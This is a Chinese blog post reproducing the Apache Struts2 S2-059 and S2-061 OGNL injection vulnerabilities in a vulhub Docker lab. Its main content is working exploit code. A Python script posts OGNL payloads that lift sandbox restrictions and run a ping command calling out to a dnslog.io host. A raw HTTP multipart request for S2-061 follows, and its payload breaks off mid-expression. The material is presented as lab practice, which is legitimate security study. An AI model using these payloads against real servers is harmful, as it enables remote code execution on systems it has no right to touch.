status-s2059_061漏洞复现
发表于|更新于
|字数总计:439|阅读时长:2分钟|阅读量:
status s2-059
xss-1
首先搭建靶场
1 2 3 4 5
| git clone https://github.com/vulhub/vulhub.git cd vulhub/struts2/s2-059 docker-compose up -d # 建议换源操作网易源是个不错的选择 # http://hub-mirror.c.163.com
|
xss-2
进入页面,这个页面
上poc(官网的没回显)
https://dnslog.io/ 下面IP和dns地址记得修改
1 2 3 4 5 6 7 8 9 10 11 12
| import requests url = "http://127.0.0.1:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}" } data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('ping ??.dnslog.io'))}" } res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
|
ojbk
status s2-61
xss-3
官网这个链接有毒 https://vulhub.org/#/environments/struts2/s2-061/
还是老老实实访问 vulhub/struts2/s2-061/Readme.zh-cn.md吧
1 2
| cd vulhub/struts2/s2-061 docker-compose up -d
|
bp抓包发送给重发器,https://dnslog.io/ 下面IP和dns地址记得修改
上poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /index.action HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Length: 790
------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id"
%{('Powered_by_Unicode_Potats0,enjoy_it').( ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
|
又Get到了一个新功能,记得收藏哦,收藏这个 dnslog.io
推荐:阿乐你好
靶场:vulhub
星球:网络安全0day共享库